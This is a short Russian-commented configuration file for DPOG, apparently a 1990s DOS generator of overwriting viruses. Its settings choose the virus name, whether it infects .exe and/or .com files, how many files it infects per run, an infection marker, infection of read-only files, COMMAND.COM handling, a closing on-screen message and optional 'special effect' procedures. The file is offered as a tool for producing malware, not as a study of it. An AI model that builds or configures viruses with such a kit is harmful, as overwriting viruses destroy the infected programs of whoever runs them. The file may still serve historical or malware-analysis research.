;Конфигурационный файл для Duke's Pascal Overwriting Generator (DPOG) v0.01
;==========================================================================
;Автор вируса
A=Duke/SMF
;Имя создаваемого вируса
B=DPOG Demo Virus
;В какой файл записать исходный текст вируса
C=sample.pas
;Тип поражаемых файлов:
;D=E - поражать *.exe
;D=C - поражать *.com
;D=B - both (т.е. поражать и *.exe, и *.com)
D=B
;Сколько файлов поражать за один запуск
;E=0 - все файлы текущего каталога
E=3
;Метка зараженности (2 символа)
F=M$
;Поражение Read-Only (только для чтения) файлов
;G=Y - Да, поражать Read-Only файлы
;G=N - Нет, не поражать
G=Y
;Использовать COMMAND.COM для заражения
;H=Y - Да, использовать COMMAND.COM
;H=N - Нет, использовать собственные процедуры
H=N
;Проверять и не заражать COMMAND.COM
;Используется при D=C или D=B
;I=Y - Не заражать COMMAND.COM
;I=N - Заражать файлы без проверки
I=Y
;Вывод на экран текстовых строк в конце работы вируса.
;Если оставить строчку пустой, то ничего не выводится.
;Число строчек не должно превышать 25.
J=This is DPOG Demo Virus
J=Created (c) by Duke/SMF
;Подключение файла со спецэффектами.
;К вирусу могут подключаться только процедуры, оформленные в виде:
;    procedure имя_процедуры;{без параметров}
;    begin
;    {........}
;    end;
;Если процедуре требуются другие модули, помимо dos.tpu, то их надо
;подключить в процедуре.
;Формат записи: K=имя_файла#имя_процедуры
K=
;Оптимизация кода вируса
;L=Y - Используются директивы, уменьшающие размер тела вируса
;L=N - Код не оптимизируется
L=Y
;---------------- Конец конфигурационного файла -------------------------
